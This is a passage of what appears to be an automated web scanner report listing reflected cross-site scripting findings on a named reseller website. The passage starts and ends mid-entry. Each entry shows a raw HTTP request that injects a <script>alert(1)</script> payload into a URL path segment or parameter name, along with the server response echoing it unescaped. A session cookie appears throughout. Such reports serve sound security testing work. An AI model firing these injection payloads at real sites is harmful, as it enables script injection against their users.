Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesca612<script>alert(1)</script>6f87f7d9523/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3413. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dc9c7<script>alert(1)</script>b4cc3f58cfd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosdc9c7<script>alert(1)</script>b4cc3f58cfd/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosdc9c7<script>alert(1)</script>b4cc3f58cfd/images/review/ was not found on this server.</p>
...[SNIP]...

2.3414. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload afc39<script>alert(1)</script>226ee5281de was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/imagesafc39<script>alert(1)</script>226ee5281de/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/imagesafc39<script>alert(1)</script>226ee5281de/review/ was not found on this server.</p>
...[SNIP]...

2.3415. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d05e<script>alert(1)</script>d4702f0e196 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review4d05e<script>alert(1)</script>d4702f0e196/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review4d05e<script>alert(1)</script>d4702f0e196/ was not found on this server.</p>
...[SNIP]...

2.3416. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fd7b<script>alert(1)</script>92dfbd8b54c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/?4fd7b<script>alert(1)</script>92dfbd8b54c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/?4fd7b<script>alert(1)</script>92dfbd8b54c=1 was not found on this server.</p>
...[SNIP]...

2.3417. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0af7<script>alert(1)</script>93cf923b01d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0af7<script>alert(1)</script>93cf923b01d/5/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0af7<script>alert(1)</script>93cf923b01d/5/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3418. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74b15<script>alert(1)</script>132821824cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/574b15<script>alert(1)</script>132821824cd/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/574b15<script>alert(1)</script>132821824cd/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3419. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3f6f4<script>alert(1)</script>9478dbb1e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes3f6f4<script>alert(1)</script>9478dbb1e2/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes3f6f4<script>alert(1)</script>9478dbb1e2/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3420. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf86<script>alert(1)</script>fcdab35e9a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosebf86<script>alert(1)</script>fcdab35e9a2/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosebf86<script>alert(1)</script>fcdab35e9a2/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3421. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8aebc<script>alert(1)</script>37a68337402 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images8aebc<script>alert(1)</script>37a68337402/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images8aebc<script>alert(1)</script>37a68337402/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3422. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 992ae<script>alert(1)</script>b0e14acbc8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review992ae<script>alert(1)</script>b0e14acbc8f/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review992ae<script>alert(1)</script>b0e14acbc8f/5.gif was not found on this server.</p>
...[SNIP]...

2.3423. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3be61<script>alert(1)</script>5db3f56e96f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/5.gif3be61<script>alert(1)</script>5db3f56e96f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/5.gif3be61<script>alert(1)</script>5db3f56e96f was not found on this server.</p>
...[SNIP]...

2.3424. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 418cb<script>alert(1)</script>f27df6612c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/5.gif?418cb<script>alert(1)</script>f27df6612c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/5.gif?418cb<script>alert(1)</script>f27df6612c2=1 was not found on this server.</p>
...[SNIP]...

2.3425. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7fcf4<script>alert(1)</script>2860846cb73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7fcf4<script>alert(1)</script>2860846cb73/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7fcf4<script>alert(1)</script>2860846cb73/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3426. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53f1f<script>alert(1)</script>8b172081c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/553f1f<script>alert(1)</script>8b172081c06/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/553f1f<script>alert(1)</script>8b172081c06/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3427. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29c90<script>alert(1)</script>d0bc5c856cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes29c90<script>alert(1)</script>d0bc5c856cf/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes29c90<script>alert(1)</script>d0bc5c856cf/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3428. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49e2b<script>alert(1)</script>af33b366e22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos49e2b<script>alert(1)</script>af33b366e22/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos49e2b<script>alert(1)</script>af33b366e22/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3429. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5b983<script>alert(1)</script>c7906bcdfd3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images5b983<script>alert(1)</script>c7906bcdfd3/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images5b983<script>alert(1)</script>c7906bcdfd3/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3430. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c9284<script>alert(1)</script>03bf1aab3e9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/reviewc9284<script>alert(1)</script>03bf1aab3e9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/reviewc9284<script>alert(1)</script>03bf1aab3e9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3431. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8ee05<script>alert(1)</script>62db1521266 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

